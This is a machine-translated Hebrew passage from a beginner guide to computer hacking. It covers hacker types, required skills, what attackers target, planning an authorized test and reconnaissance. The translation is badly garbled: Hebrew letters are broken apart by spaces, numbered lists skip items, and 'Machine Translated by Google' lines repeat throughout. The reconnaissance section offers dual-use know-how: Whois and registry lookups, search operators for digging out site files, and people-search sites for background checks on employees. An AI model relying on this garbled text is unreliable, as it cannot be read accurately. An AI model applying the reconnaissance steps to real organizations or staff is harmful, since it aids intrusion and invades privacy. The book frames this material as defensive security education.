Professional Documents
Culture Documents
Hacking - Beginner To Expert Guide To Computer Hacking
Hacking - Beginner To Expert Guide To Computer Hacking
פריצה
פריצה
אני רוצה להודות לך ו ל ברך אותך ע ל הורדת ה ספר "פריצה :מדריך למת חי לים לפריצת מ ח ש בים ,א ב ט חה ב סי סית ו בדי קות
”
חדירה.
ספר זהי למד אותך כיצד תו כ ל להגן ע ל עצמך מפני רו ב הת קפות הפריצה הנפוצות --ע לידיידיעתך כיצד הפריצה פוע לת
בפוע ל! א חרי ה כ ל ,כדי למנוע מהמער כת ש לך להיפגע ,אתה צריך להי שאר צעד לפני כ ל הא קר פ לי לי .אתהי כו ל לע שות
זאת ע לידי לימוד כיצד לפרוץ ו כיצד ל בצע פריצה נגדית.
בתוך ספר זה ט כני קות ו כ לים המ שמ שים הא קרים פ לי ליים ואתיים כא חד -כ ל הד ברים שתמצאו כאןיראו ל כם כיצד ניתן
ל ס כן א ב ט חת מידע ו כיצד תו כ לו לזהות הת קפה במער כת שאתם מנ סים להגן ע ליה . .במ ק בי ל ,ת למדו גם כיצד תו כ לו
למזער נז קים במער כת ש ל כם או לעצור מת קפה מתמ ש כת.
תו כן העניינים
מ בוא
תו כן העניינים
מיפוי הר שת
ב כ ל פעם שאתה נת ק ל במי לה פריצה ,אתה כנראה מ שייך אותה ל ש לי חת תו כנית מוצפנת למ שתמ ש א חר ,ואזי כו לת ל ק ב ל
גי שה לא מור שית במ ח ש ב מרו ח ק.
עם זאת ,המונ ח פריצה שימ ש כדי להגדיר כ ל פעו לה ש ל התע ס קות ב חומרה או בתו כנה ש ל מ ח ש ב מ ל בד ה שימו ש המיועד,
ע ל מנת ל שפר אותה ו לג לות כיצד מ כ שירים א ל ק טרונייםי כו לים לע בוד באופן א ל ק טרוני .באופן א ל ק טרוני.
למרות שההגדרה הזו מ ב חינה ט כנית עדיין מת קיימת ,הפריצה בה ח ל ט ע שתה תפנית חד שה לגמרי ,במיו חד כ שזה מגיע
לאופן ש בו אדם א חרי כו ל לג שת למ ח ש ב ש ל מי שהו א חר .לפני שאתם חו ש בים שהא קינג הוא ר ק הע ברת ניירות ערך כדי
לזרוע הר ס במ כ שיר הדיגי ט לי ש ל מי שהו א חר,יית כן שתצ טר כו לה כיר את סוגי הא קרים ה קיימים בימינו.
Machine Translated by Google
מי פורץ?
ידועים גם בתור הא קרים פ לי ליים או קר קרים ,אנ שים א לה הם א לה שמ ק ב לים בזדון גי שה למער כת ש ל אדם א חר למען רוו ח אנו כי .הם בדרך כ ל ל פורצים
מ כ שירים א ל ק טרוניים ומ שנים ,גונ בים או מו ח קים ק בצים קרי טיים למען הרוו ח האי שי ש להם.
הא קרים ש ל כו בע ל בן ,או הא קרים אתיים ,מג לים דר כים כיצד ניתן לנצ ל את המער כת ש ל המ כ שיר כדי ל למוד כיצד אנ שיםי כו לים להגן ע ל עצמם מפני
הת קפות אפ שריות .הא קרים האתיים ה ל לו גם מ קפידים ע ל עד כון שירותי הא ב ט חה שהם מנפי קים .הם עו שים זאת ע לידי שמירה ע ל מע ק ב ו חפירה
פעי לה א חר הניצו ל ה חד ש ביותר ופגיעויות מער כת חד שות.
הא קרים אתיים גם מ קפידים ע ל כך שהם מג לים דר כים חד שות ל למוד כיצד ניתן להתע ס ק עם מ כ שיר א ל ק טרוני כדי למ ק סם את היעי לות ש לו .מ סי בה זו,
הם בונים קהי לות המאפ שרות להם לא סוף את הידע ש להם כדי ל שפר את האופן ש בו אנ שים מ שתמ שים במ כ שירים ש להם.
כפי שה שם מרמז ,הם מונעים ממניעים ש ל פריצת כו בע ל בן ו ש חור -הם א לה שמ שתמ שים ב ט כני קות לא חו קיות ו חו קיות כא חד כדי לנצ ל או ל שפר
מער כת .עם זאת ,אם הא קר כו בע אפור מנצ ל את המער כת ש ל אדם א חר ,הוא בדרך כ ל ל מ קפיד ליידע את ה בע לים ע ל הניצו ל שנע שה ואז מציע הצעות
מה ניתן לע שות כדי ל שפר את א ב ט חת המער כת.
ברגע שתצ לי חו לזהות את ההא קרים שאתם צפויים להית ק ל בהם ,תו כ לו לדעת את המו טי בציה שי ש להם לפריצה ואת סוגי הפריצות שהם צפויים
להמציא.
Machine Translated by Google
האם הא קינג מתאים ל כו לם?
בעוד שהפריצה מיו ח סת בדרך כ ל ל לאנ שים שיודעים ל קוד ,כ ל א חדי כו ל ל למוד כיצד לפרוץ.י חד עם זאת ,עדיף גם לז כור
שאין דרך א חת ל למוד כיצד לפרוץ – פריצות ל שיפור או לת קוף מער כות נוצרות באמצעות א בו לוציה מתמ ש כת ש ל הידע
ש ל המ שתמ ש ע ל ביצועי המער כת .כ שאתה קורא את זה ,אתהי כו ל ל סמוך ע ל האפ שרות ש כ בר נוצרה דרך חד שה להגן או
לת קוף מ כ שיר או ר שת.
אםי ש לך מ ח ש ב או ט לפון נייד ,אז אתה המועמד ה טו ב ביותר להיות הא קר.י ש לך את המו טי בציה הנ כונה ל למוד איך
להתע ס ק עם מער כת ו ל שפר את אופן ה שימו ש בה .מ כיוון שאתה מת ח בר למ שתמ שים א חרים ב חוץ באמצעות הורדות,
הודעות ,ר כי שות מ קוונות או הע לאות ,אתה צריך ל שים ל ביותר לאופן ש בו אתהי כו ל לא ב ט ח את המער כת ש לך .כדי
לע שות זאת ,אתה צריך ל למוד איך הא קר כו בע ש חור חו ש ב ,ה ח ל מהמו טי בציה שי ש לו לת קוף מער כת ,ועדי סודות
ההת קפה .מנ קודה זו ,ת בינו שי ש ל כם שפע ש ל אמצעי מניעה ב כ ל הנוגע לעצירת חדירה ב לתי מור שית ואפי לו הפע לת
מת קפת נגד.
Machine Translated by Google
מה ת ק ב ל כאן
ספר זהי ספר ל כם ע ל הא ס טר טגיות הנפוצות ב שימו ש ע לידי הא קרים עם כו בע ש חור ,שיאפ שרו ל כם ל בדו ק את נ קודות
התורפה ש ל המער כת ש ל כם ו כיצד תו כ לו ליפו ל למ ל כודות שונות המונ חות ע בור רו ב המ שתמ שים ב חוץ .כאן ת למד כיצד
אנ שים הופ כים להיות מועמדים להפוך ל קור בנות פו טנציא ליים ש ל הא קרים פ לי ליים ו כיצד אתהי כו ל להגן ע ל עצמך מפני
הת קפות כא לה .ב ש ל ב זה ,אתה מ בין את הרעיון -אתה בדרך להפוך להא קר אתי.
מ כיוון שהדאגה העי קרית ש לך היא הא ב ט חה ש לך ו בה קפדה ע ל כך שאתה מ בין מדוע הת קפות עו ברות דרך מער כות
שונות ,תצ טרך גם ל למוד כיצד מת בצעות הת קפות מ ל כת חי לה .תו כ ל לה בין כיצד הא קרים פ לי ליים חודרים למ כ שירים ע ל
ידי לימוד כ לים ,ט כני קות והת קפות שהם מ שתמ שים בהם ב ס חר ש להם.
ברגע שת בינו כיצד ניתן להתפ שר ע ל מ כ שיר א ל ק טרוני,יהיה ל כם מו שג טו ביותר מה אתםי כו לים לע שות כדי למנוע את זה.
Machine Translated by Google
האם ק שה ל למוד ו לה בין?
אמנם פריצה דור שת תרגו ל ר ב ,א ב ל זה לא ע ס ק ק שה להיות בו .כ ל עוד אתהיודע איך לה שתמ ש במ ח ש ב ואתהי כו ל
לע קו ב א חר ההוראות שתמצא ב ספר זה ,אתהי כו ל ל בדו ק או אפי לו ל בצע פריצות שאתהי קראו בפר קים ה באים.
אם אינךיודע כיצד ל קודד עדיין ,א ל דאגה -תו כ ל למצוא הוראות מפור טות לג בי תו כנת קידוד ,מער כת הפע לה וא חרות
בהמ שך .עם זאת ,אם אתה רוצה להצ טיין בפריצה ואתה רוצה לפת ח אמצעי א ב ט חה מ ש לך או ל ב חון גר סה ש ל הת קפה,
אזי ש צורך ב כי שורי קידוד.
Machine Translated by Google
מיומנויות שאתה צריך
זה אומר שאתה צריך להיות בע ל כי שורים ש חורגים מיצירת מ סמך וורד או הי כו לת לג לו ש באינ טרנ ט .כדי להיות הא קר ,אתה צריך
לדעת איך לה שתמ ש ב שורות פ קודה שונות ש ל Windows,להגדיר ר שת או לערוך את הרי שום ש ל המ ח ש ב ש לך.
מ כיוון שר בות ,אם לא רו בן ,מהת קפות הא קרים נע שות באופן מ קוון ,ע ליך ל ש לו ט במו שגים ו במונ חים ש ל ר שת ,כגון:
NAT
נת בים
נמ לים
VPN
IPv6
DNS
ר שת מ שנה
DHCP
IPv4
דוגמנות OSI
מנות
TCP/IP
כמע ט כ ל ההא קריםיצ טר כו לה שתמ ש במער כת ההפע לה לינו ק ס מ כיוון שהיא מאפ שרת תו כניות ותי קונים שאינם אפ שריים
במער כות ההפע לה Windowsו .caM-כמע ט כ ל כ לי הפריצה שתו כ לו למצוא גם עו שים שימו ש במער כת הפע לה זו.
-tcpdumpהידוע בתור מנת ח פרו טו קו ל שורת פ קודה או סניפר ,בעוד Wiresharkידוע כ כ לי הפופו לרי ביותר ש קיים
שעו שה את אותה פונ קציה.
כ ל הא קר אמור להיות מ סוג ל לה בין את המו שגים וה ט כנו לוגיות ה ח שו בים ביותר ה ק שורים ל ט כנו לוגיית מידע .מ סי בה זו,
ע ליך לה כיר ט כנו לוגיה ומו שגים א ל חו טיים ,כגון Secure Sockets Layer (SSL),חומות א ש ,מער כת זיהוי חדירה (IDS),
ת שתית מפת ח צי בורי ) (PKIו כן ה לאה.
הי כו לת ליצור ו לערוך ס קריפ טים מאפ שרת לך ליצור כ לים מ ש לך ו להצ לי ח להיות עצמאיים מה כ לים שפות חו ע לידי הא קרים
א חרים .ע לידי הי כו לת ל בנות כ לים מ ש לך ,אתה מאפ שר לעצמך לפת ח הגנות טו בותיותר כא שר הא קרים פ לי לייםיוצרים
פריצות טו בותיותר .כדי לע שות זאת ,ע ליך להיות מ קצוען ב שימו ש לפ חות בא חת מ שפות ה ס קריפ ט הנפוצות ,כגון Rails
Ruby onאו Python.
8.מיומנויות מ סד נתונים
אם אתה רוצה לה בין איך הא קרים חודרים ל ב סי סי הנתונים ש ל המער כת ש לך ,אתה צריך לדאוג שאתהיודע איך מ סדי
נתונים עו בדים .זה אומר שאתה צריך ל ש לו ט במער כת ניהו ל מ סד נתונים כגון Oracleאו MySQL.
9.הנד סה לא חור
הנד סה לא חור מאפ שרת לך להמיר תו כנה זדונית או ניצו ל דומה ל כ לי פריצה מת קדםיותר .עם המיומנות הזו מגיעה הה בנה
ש כמע ט כ ל הניצו ל שנע שה ע לידי הא קרים מגיע מניצו לים קיימים א חרים -ברגע שת בין כיצד פוע לת ת כונת תו כנה זדונית
או ניצו ל ,תהיה לך ה בנה טו בהיותר כיצד פריצות א חרות פוע לות נגד מער כת.
10.קריפ טוגרפיה
קריפ טוגרפיה ,כמיומנות ,מאפ שרת לך לה בין כיצד הא קרים מ סתירים פעי לויות ומ סתירים את ע ק בותיהם בזמן ביצוע
פריצות .זה גם עוזר לך לה בין את ה חוז קות וה חו ל שות ש ל א לגוריתמים שונים המ שמ שים לפענו ח מידע אי שי ,כגון סי סמאות
מאו ח סנות.
Machine Translated by Google
Machine Translated by Google
Machine Translated by Google
Machine Translated by Google
Machine Translated by Google
פר ק 2:כיצד הא קרים מוצאים את המ טרות ש להם
הא קרים פ לי ליים הם כנראה בין ה חו קרים הא ס טר טגיים ביותר שתפג שו בעו לם ה ט כנו לוגיה .ע ל מנת שההא קרי שיג כמה
שיותר נתוניםי קרי ערך ב שיגור הת קפה בודדת ,הם מ ח כים שה קור בן המו ש לםיופיע ב סוויפ ש להם,י ח קור את ה טרף ש לו,
ואזימציא את המת קפה ה טו בה ביותר שהםי כו לים לגיי ס מהמיומנות ש להם .מַ ֲע ֶר כֶת.
הת קפת כו בע ש חורי כו לה ל כוון לאדם בודד או ל כמה אנ שים בו זמנית ,אך לרו ב ,הא קר פוע ל בני שה מ סוימת.י שנם הא קרים
שירצו למצוא נ קודות תורפה במער כות בנ קאיות באינ טרנ ט ,כי זהי ספ ק להם גי שה למי ליוני פי קדונות שהםי כו לים להע לים
דרך המער כות ש להם.
ח ל קם מערי כים מידע אי שי וממ שי כים ל בצע הת קפות אי שיות.י ש המעדיפים לה ש חית דפי נ חיתה ו ל שדר אתי כו לתם לע בור
דרך א ב ט חת אתר אינ טרנ ט .ח ל קם בו חרים לפרוץ ח ש בונות כדי שיו כ לו להי שאר אנונימיים ו לע שות שימו ש ב שירותים מ ב לי
ל ש לם אגורה.
לא מ שנה מה המניע ש ל ההא קר הפ לי לי בפריצה למער כת מ סוימת ,הםימ שי כו במת קפה ר ק אם הםיג לו שאפ שר לע שות
את זה ו שהםי כו לים להרווי ח מזה מ שהו .עם זאת ,הדרך ה טו בה ביותר למנוע הת קפת פריצה היא ל שמור מידעי קר ערך
מהצי בור כ כ ל האפ שר .בעוד ש שיתוף מידע כמע ט נ ח ש ב כה כר ח בימינו ,אתה צריך לוודא שאתה מ שתף נתונים ר ק עם
מ שתמ שים לגי טימיים.
Machine Translated by Google
ד ברים שהא קרים מ חפ שים
לרגע ,הי כנ ס לתוך מו חו ש ל הא קר פ לי לי .אם אתה רוצה לגנו ב מידע או ל ס כן מער כת ,אתהיודע שאתהי כו ל להפי ק ערך
מהד ברים ה באים:
הא קרים זדוניים מ בצעים בדרך כ ל ל חיפו ש מ קוון כדי ל חפ ש מ טרות אפ שריות ,ו בין המועמדים ה טו בים ביותר למת קפה הם
אותם ארגונים המ ספ קים תיאורים מפור טים ש ל מ כ שירים שי ש להם גי שה א ליהם ,כו ל ל סוג התו כנה וה חומרה שהם הת קינו.
ברגע שהא קריםיודעים ש לאדם מ סויםי ש גי שה לנ קודה או לי פגיעה בא ב ט חה ה ט כנו לוגית ש ל הארגון ,הם מ ק ב לים מו שג
למי ע ליהם לפרוץ רא שון.
כ ל הא קרי כו ל לה שיג מידע שימו שי במיו חד זה ב חיפו ש מ קוון פ שו ט .ע לידי חפירה מ קוונת ,תו כ ל למצוא את כ ל הרי שומים
ש ל -SEC,הההצעות הצי בוריות ,ה ק בצים הנגי שים לצי בור ,מנויים ועוד ר בים א חרים .אתהי כו ל אפי לו ל חפ ש את כ ל האנ שים
המעור בים בארגון מ סוים ,את מועד פר סום האתר ואת מנה ל האתר המעור ב ביצירת א ב ט חת אינ טרנ ט ע בור ארגון .הידע
הזהי כו ל ב ק לות לעזור להא קר להת כונן למת קפה מ קוונת מ סי בית שי כו לה להפי ל את האתר ואת מ סד הנתונים ש ל ארגון
ש לם.
2.מנויים ות ש לומים
הא קרים נו טים לפרוץ מ כ שירים ו ח ש בונות ב בע לות אדם שמ בצע ת ש לומים או ר כי שות מ קוונות .מ כיוון ש סמאר טפונים ,מיי לים
ומער כות ת ש לום מ קוונות מ כי לים שפע ש ל מידע אי שי ,כו ל ל כר טי סי א שראי ודפי בנ ק ,פריצה למער כות א לו מ ק לה ע ל כ ל
הא קר פ לי לי לה שיג גני בת זהות.
בעוד שי ש מי שיגידו שאו לי אין שום ד בר בע ל ערך ב ח ש בון פיי ס בו ק אי שי ,הי כו לת ל ק ב ל גי שה ל ח ש בונות מדיה ח ברתית גם
מאפ שרת להא קר ל ק ב ל גי שה לפר טים אי שיים א חרים ,כגון סי סמאות ,מיי לים ומ ספרי ט לפון ניידים.
4.מיי לים
הודעות דוא" ל מ שמ שות כמר כז המידע האי שי ש לך מ כיוון שהוא מ שמ ש כנ קודת ב קרה ל כ ל ה סי סמאות ש לך ,ח ש בונות
ת ש לום מ קוונים ,בין היתר.
5.סי סמאות
הא קרים ר בים מ בצעים הת קפה שנע שתה כדי ל חזות ,ל ח ט ט או להת חזות ל סי סמה ש ל מ שתמ ש .פעם הם
Machine Translated by Google
מ סוג לים למצוא סי סמה בודדת ,הם כמע ט ב טו חים שמ שתמ ש ע שוי לה שתמ ש בהם ע בור ח ש בונות שונים או לה שתמ ש
בגר סה ש לה ע בור כני סות א חרות.
6.חומרה פיזית
ה כי ק ל לגנו ב מידע כ שי ש לך גי שה פיזית למ כ שיר כמו סמאר טפון או מ ח ש ב אי שי .אתהי כו ל ל בדו ק ב ק לות את כ ל ה ח ש בונות
שניג שים א ליהם דרך הרי שום ,הי ס טוריית הדפדפן או סי סמאות שמורות אפי לו ב לי צורך לה שתמ ש ב קוד.י חד עם זאת ,גי שה
פיזית למ כ שיר מאפ שרת לך גם לאפ שר ל שתו ל מ כ שיר האזנה במער כת ש לו ע ל מנת לדוג כ ל מידע נו סף ב כ ל נ קודה בעתיד.
7.מו קד מי קומים
אם הא קר לאי כו ל למצוא עדיין פגיעות במער כת שהוא רוצה לפרוץ ,הד בר ה בא שהואינ סה למצוא הוא הי כן נמצאת
מער כת המ ח ש ב .זהיאפ שר לו להמ שיך ו ל ח קור נ קודות תורפה באמצעות הנד סה ח ברתית ,צ לי לה לא שפה ,או אפי לו ה שגת
גי שה פיזית למ כ שיר ממו קד.
מ כיוון ש ל כ ל המ ח ש ביםי ש כתו בת MAC,ו ל כ ל מ כ שיר המ חו בר דרך האינ טרנ טי ש כתו בת IP,ניתן ל חפ ש ב ק לות כ ל מ כ שיר
בעו לם ע ל מנת לה בין הי כן הוא נמצא .הא קר ,לעומת זאת,יודע לה סתיר את מי קומו כדי להי שאר ב לתי מזוהה בזמן שהוא
יוצא להת קפה.
Machine Translated by Google
ה קמת תו כנית פריצה
כא שר אתה רוצה להגן ע ל המער כת ש לך ,אתה צריך לדעת הי כן אתהי כו ל להיות מות קף ע לידי הא קר.
זה אומר ש כדי לתפו ס גנ ב ,אתה צריך ל ח שו ב כמו א חד.
כעת ,לא חר שי ש לך מו שג מה הא קר ע שוי ל חפ ש ב כ ל פעם שהוא מ בצע סוויפ ,אתהיודע הי כן להת חי ל ליצור את נ קודות
הא ב ט חה ש לך והי כן ע ליך ל בדו ק נ קודות תורפה.
ב ש ל ב זה ,אתה מ ק ב ל מו שג מדוע הא קר מ סוים ע שוי להצ ביע ע ל ארגון מ סוים ,אדם מ סוים או מ כ שיר בודד כמ טרה .כ ל
הא קר ח כםיתמ קד בנ קודות התורפה ה באות:
3.בע לי מ כ שירים שאינם מודעים למור כ בות המער כת ש להם ,או שאינם מעוד כנים בפרו טו קו לי א ב ט חה
כא שר אתה חו ש ב ע ל אופן ניהו ל המ ח ש בים וה קי שוריות לאינ טרנ ט ,אתה מ ק ב ל את הרעיון שרו ב המער כות ש בהן אתה
מ שתמ ש ע ל ב סי סיומי אינן מאו ב ט חות כפי שאתה רוצה שהןיהיו .הא קריםיודעים זאת ,ומ סי בה זו ,הםי כו לים להיות ב טו חים
שי שנן נ קודות קי שוריות מ סוימות שאינן מנו טרות כ ל ל או שי שנן נ קודות מ סוימות ב חומת א ש שניתן לפרוץ ב ק לות מ ב לי
שיזוהו .זה גם ק ל ל כ ל הא קר לנצ ל ס בי בה שהוא רוצה לת קוף ,במיו חד כא שר הםיודעים שהםי כו לים ל ק ב ל גי שה מ לאה
מ ב לי להתריע בפני מנה לי מער כת.
ברגע שפגיעות מתג לה ע לידי הא קר פ לי לי ,אתה לאי כו ל לצפות שהא קרי שמור אותה לעצמו .כ ל ההא קרים מ סוג לים
להת ח בר לעצמם בר שת כדי ל שדר את הפעי לויות ש להם ו ל ק ב ל תמי כה מא חרים ב קהי לה .מ כיוון שרו ב מנה לי המער כת
וצוותי -ITההרגי לים אינם מ בינים מתי מת קפה עומדת להתר ח ש או מהי באמת הפגיעות ש ל המער כת ש להם ,להא קרים
פ לי לייםי ש את מר ח ב הפעו לה ל קנות זמן כדי ל למוד מה תהיה המת קפה ה שימו שית ביותר .מ כיוון שתו קפים פ לי ליים שות לים
את ההת קפות ש להם ,נעים לא ט מאוד כדי להימנע מזיהוי ומ שגרים בזמן הפגיע ביותר ,ע ליך גם ליצור תו כנית פריצה אתית
ת קינה כדי למנוע כ ל הת קפה.
Machine Translated by Google
ל ק בוע מ טרות
אתה צריך לה קיםיעדי פריצה מ ש לך ע לידי גי לוי נ קודות התורפה ש ל המער כת ש לך כדי ל ב ס ס מ ספי ק א ב ט חה כדי להגן
ע ליהם מפני הת קפות .מ כיוון שאתה הו לך נגד אוי ב ערמומי מאוד ,אתה צריך ל ק בועיעדים ו לו חות זמנים מאוד ספציפיים
לג בי מתי אתהי כו ל להת חי ל לפרוץ למער כת ש לך.
הערה ח שו בה :ז כור ש לפני שאתהיוצר תו כנית ,ע ליך לוודא שי ש לך את כ ל האי שורים ל בדי קת מער כות .כמו כן ,ה קפד
לתעד פריצה אתית ומער כת ש בד קת ע ליהן ,ו ל ספ ק עות ק ש ל התיעוד להנה לה .זהיוודא שי ש לך את ההגנה הדרו שה לך
ר ק ב כ ל מ קרה שתג לה שמער כת נפגעת או כ שמ שהו ב לתי צפוי קורה ב ח קירה ש לך.
אם אתם בוד קים מער כת מ ש ל כם ,תיעוד ה כ ל ,כו ל ל כ ל פריפריות התו כנה ש בד קתם ו סוג ה בדי קות ש ביצעתם ,הוא חו בה.
זהי ב טי ח שע שיתם נ כון את כ ל ה ש ל בים ,ואם תצ טר כו ל חזור ע ל ע ק בותי כם,י ש ל כם רעיון לאן כדאי ל חזור.
אתה צריך ל ק בוע איזה ח ל ק במער כת ש לך הוא ה חיוני ביותר ע בורך .אם אתה מ חזי ק במאגר מידע אי שי או קו בץ ש ל פרוי ק ט
ח שו ב שר בים היו רוצים ל שים ע ליו את היד ,אז הגיוני שתגן ע ל ה ק בצים הא לה קודם.
אמנםי שנם כ לים חינמיים ר בים באינ טרנ ט שיאפ שרו לך ל בצע בדי קות ופריצות ,א ב ל כמות הזמן ,ה כ סף והמאמץ שאתה
י כו ל לה ש קיע בפריצות ש לךי ק בעו באי לו סוגי כ לים תו כ ל לה שתמ ש כדי להגן ע ל המער כות ש לך ו ל ח קור נ קודות תורפה
אפ שריות . .עם זה ב ח ש בון ,אתה מ ק ב ל את הרעיון שאם אתה מעריך זמן ומאמץ ,אתה צריך את הת קצי ב הנ כון כדי לר כו ש
כ לי הא קרים אתיים מה שורה הרא שונה.
אם אתה נ ש כר כהא קר אתי ע לידי ארגון ,אתה צריך ל ק בוע איזה סוג ש ל הצד קה אתה צריך להציג את ההנה לה כדי לה שיג
את התוצאות ה טו בות ביותר האפ שריות מתוך המ ח קר ש לך.
Machine Translated by Google
Machine Translated by Google
Machine Translated by Google
פר ק 3:מיפוי הפריצות ש לך
כא שר אתה מ חפ ש נ קודות תורפה ,אינך צריך ל בדו ק כ ל פרו טו קו ל א ב ט חה שהת קנת ע ל כ ל המ כ שירים ש לך בו זמנית -
פעו לה זו לא ר ק תהיה מאוד מ ב ל ב לת ,א לא גם ע לו לה לגרום ל כמה בעיות מ כיוון שיהיו לךיותר מדי הר בה ע ל הצ ל חת ש לך.
במידת האפ שר ,הפוך את ה בדי קות ש לך לניתנות לניהו ל ע לידי פירו ק פרוי ק ט ה בדי קה ל ש ל בים מע שייםיותר.
כדי לה ק ל ע ליך לה ח לי ט איזו מער כות צריך ל ל כת קודם ,שא ל את עצמך את ה שא לות ה באות:
1.אי לו מער כות ,בעת ת קיפה,יגרמו לצרות הר בות ביותר אויצרו את ההפ סדים ה בעייתיים ביותר?
3.אי לו ח ל קים במער כות ש לך ה כי פ חות מתועדים ,נ בד קים לעתים ר חו קות ,או שאתה ב קו שייודע מ שהו ע ליהם?
לא חר שת סיים ליצור את היעדים ש לך וזיהית את ה ח ל קים הפגיעים ביותר ש ל המער כות ש לך ,כעת תו כ ל לה ח לי ט אי לו מהם
ע ליך ל בדו ק קודם .ע לידי ה כרת התוצאות ש ברצונך לה שיג וערי כת תו כנית ניתנת ל ביצוע ,תו כ ל להגדיר את הציפיות ש לך
כראוי ו ל ק ב ל הער כה טו בה לג בי כמה זמן ע ליך ל בצע בדי קות ו כמה מ שא בים ע ליך לה ש קיע ב כ ל בדי קה שת בצע.
Machine Translated by Google
ארגון הפרוי ק ט ש לך
א לה צרי כים להיות המער כות ,היי שומים והמ כ שירים שע לי כם ל בצע ע ליהם את ה בדי קות:
2.חומות א ש
כעת ,כמות ה בדי קות שתו כ ל ל בצע תהיה ת לויה ב כמה מ כ שירים ומער כות אתה צריך ל בצע את ה בדי קות ש לך .אםי ש לך
ר שת ק טנה ,אז אתהי כו ל ל בדו ק כ ל פריפריה .עם זאת ,כ ל תה ליך הפריצהי כו ל להיות גמי ש וצריך להיות ת לוי במה שה כי
הגיוני ע בורך.
אם אתה מת ק שה באיזו פריפריה או מער כת ע ליך להת חי ל ל בדו ק ת חי לה ,ש קו ל את הגורמים ה באים:
כ ל פריצה מוצ ל חת בהת ב ס ס ע ל התזמון ש ב חרת להפעי ל מת קפת בדי קה .כא שר אתה ממפה את לו ח הזמנים ש ל ה בדי קות
ש לך ,וודא שאתה מ בצע את ה בדי קות ש לך בזמנים שיגרמו לפ חות הפרעה למ שתמ שים א חרים .אינך רוצה לגרום ל בעיות
בעת בדי קת מת קפת מניעת שירות ) (DoSבת קופה ע ס קית קרי טית ש בה מ כירות בדרך כ ל ל מגיעות לארגון ש בו אתה עו בד.
אתה גם לא רוצה להית ק ל ב בעיות מער כת ו לא להיות מ סוג ל לפתור את זה בדיו ק בזמן לפני שאתה צריך לה שתמ ש במ ח ש ב
ש לך.
בעת תזמון בדי קות ,ודא ש כ ל המעור בים מעור בים בתו כנית ש לך .זהיעזור לך להגדיר ציפיות וגםייתן לך ציר זמן לג בי מתי
אתה צריך ל סיים את ה בדי קה.
Machine Translated by Google
מה א חרים רואים?
אתהי כו ל ל ק ב ל פר ספ ק טי בה טו בהיותר ע ל הפגיעות ש ל המער כות שאתה צריך ל בדו ק ע לידי ה סת כ לות ת חי לה ע ל מה
שהא קרים פ לי ליים פו טנציא ליים ע שויים לראות מ ב חוץ .כדי לע שות זאת ,אתה צריך לראות איזה סוג ש ל שו ב לים המער כת
ש לך מ שאירה שם ב כ ל פעם שמי שהו מ שתמ ש בר שת ש לך.
1.הפע ל חיפו ש מ קוון ע ל הארגון ש בו אתה עו בד .אם אתה מ בצע בדי קות למער כת האי שית ש לך ,חפ ש פרי טים ה ק שורים
א ליך.
2.בצע בדי קה ע ליציאות פתו חות אפ שריות או הפע ל סרי קת ר שת מ לאה כדי ל ק בוע דו חות מער כת ספציפיים שאנ שים
מ ב חוץ ע שויים לראות לג בי המ כ שירים ש לך .מ כיוון שאתה ה בע לים ש ל המער כת שאתה עומד ל בדו ק ,אתהי כו ל לה שתמ ש
ב סור קייציאות מ קומיים ו ב כ לי איתור שיתוף הזמינים -Windows,ב כגון LANguardאו GFI.
לא חר מ כן ,תו כ ל ל בצע חיפו שים ספציפייםיותר באינ טרנ ט .נ סה למצוא את הד ברים ה באים:
2.מ סמ כי SEC
5.פר טי הת ק שרות המפנים כ לפי ח ברי הארגון או העו בדים .אתהי כו ל ל בצע בדי קות ר קע באופן מיידי באתרים ה באים:
1. USSeach
2. ChoicePoint
3. ZabaSearch
הנה טיפ :אם אינך מוצא את המידע שאתה מ חפ ש או אם אתה רוצה להעמי ק באתר באמצעות חיפו ש מי לות מפת ח פ שו ט,
בצע חיפו ש מת קדם באינ טרנ ט .לדוגמה ,אם אתה רוצה למצוא ק בצים באתר מ סוים ,אתהי כו ל לה שתמ ש במ חרוזות א לה
אתר)www.(domain).com :מי לת מפת ח או שם קו בץ( -ל חיפו ש ק בצים ספציפיים באתר מ סוים
filetype :swf (company)_(name) -כדי ל חפ ש ק בצי פ לא ש שאו לי ניתן לפר ק כדי ל ק ב ל גי שה למידע מוצפן
Machine Translated by Google
כעת ,לא חר שי ש לך מו שג לג בי מה שא חרים רואים לג בי מה שאתה מנ סה להגן באינ טרנ ט ,הגיע הזמן שתת חי ל למפות את
הר שת ו ל חפ ש את הפגיעויות הפו טנציא ליות ש ל המער כת ש לך.
Machine Translated by Google
מיפוי הר שת
כא שר אתה רוצה לה כין תו כנית מוצ קה כיצד אתה מת כוון לפרו ס את תו כנית הפריצה האתית ש לך ,א חד הד ברים הרא שונים
שאתה צריך לדעת הוא כמה אנ שים א חריםיודעים ע ל הר שת ש לך .למרות שאתה ע שוי ל ח שו ב שי ש לך אנונימיות מ לאה
באינ טרנ ט ,המ ח ש ב ש לך מ שאיר ל לא הרף ע ק בות המצ ביעות כ לפיך וא ל המער כת ש בה אתה מ שתמ ש.
כדי ל ק ב ל מו שג טו ביותר לג בי כמות המידע ע ליך או ע ל הדומיין ש לך זמין לצי בור ,מומ לץ לעיין בפר טים ה באים:
מי זה
Whoisהוא כ לי מ קוון ש בו אתהי כו ל לה שתמ ש כדי לראות אם שם דומיין זמין .עם זאת ,ניתן לה שתמ ש בו גם כדי לראות
מידע רי שום ע ל דומיינים קיימים .זה אומר שי ש סי כוי גדו ל ש כתו בות האימיי ל ופר טי ה ק שר ש לך מ שודרים באינ טרנ ט.
Whoisמ ספ קת גם מידע ע ל שרתי DNSשנמצאים ב שימו ש ע לידי הדומיין ש לך ופר טים ע ל התמי כה ה ט כנית ש ל ספ ק
ה שירות ש לך.י ש לו גם כ לי שנ קרא DNSstuff,שמ בצע את הפעו לות ה באות:
4. www.apnic.net -מ ספ ק מידע ע ל רי שום האינ טרנ ט האזורי ש ל א סיה פ סיפי ק.
5. ws.arin.net/whois/index.html -מ ספ ק מידע ע ל רי שום האינ טרנ ט ב ח ל קים מ סוימים ש ל אפרי קה המ שוונית ,צפון
אמרי קה ,ו כמה אזורים באיים ה קרי ביים.
6. www.lacnic.net/en -מ ספ ק מידע ע ל רי שום אינ טרנ ט ב קארי ביים ו באמרי קה ה ל טינית
7. www.db.ripe.net/whois -מ ספ ק מידע ע ל רי שום אינ טרנ ט באזורי אפרי קה ,אירופה ,המזר ח התי כון ומר כז א סיה.
פורומים ו ק בוצות Googleמ ספ קים שפע ש ל מידע ע ל מידע ר שת צי בורית ,כגון כתו בות IP,שמות מ שתמ ש ור שימות ש ל
שמות דומיין מ לאים (FQDNS).אתהי כו ל ל חפ ש טונות ש ל פו ס טים ש ל Usenetו למצוא מידע פר טי שאו לי לא ה בנת
